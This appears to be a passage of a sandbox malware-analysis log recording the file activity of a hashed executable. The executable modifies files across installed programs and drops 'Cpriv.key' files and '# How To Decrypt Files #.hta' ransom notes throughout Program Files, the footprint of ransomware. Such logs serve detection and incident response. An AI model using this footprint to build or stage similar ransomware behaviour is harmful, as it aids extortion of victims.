Office\CLIPART\PUB60COR\BS00453_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\47.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_thunderstorm.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.CSD de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174639.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBlankPage.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Hardcover.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\NETWORK\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00231_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\LogoBeta.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SUMIPNTG\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00034_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR19F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.lock de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PROOF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_hyperlink.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02448_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18254_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\FORMS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\validation.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\TableTextService\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281243.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR24F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Components\SignedComponents.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\CLIPART\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00853_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00783_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSO0127.ACL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN110.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\INVITE.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\am\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\RESP98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00444_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR21F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232393.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10267_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.WW\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PAPYRUS\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLAPPTR.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\fr.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106020.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\MLA.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293236.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\NETWORK\NETWORK.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153516.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00638_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\WARN.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PAPYRUS\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01565_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Xlate_Init.xsn de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CONCRETE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00077_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EXPEDITN\EXPEDITN.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EDGE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01759_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Casual.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\MCABOUT.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR19F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\1.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02417_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\deploy\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14515_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\logger\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1028\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ARCTIC\ARCTIC.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\INDUST\INDUST.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\bin\dtplugin\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ar.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\Cpriv.key 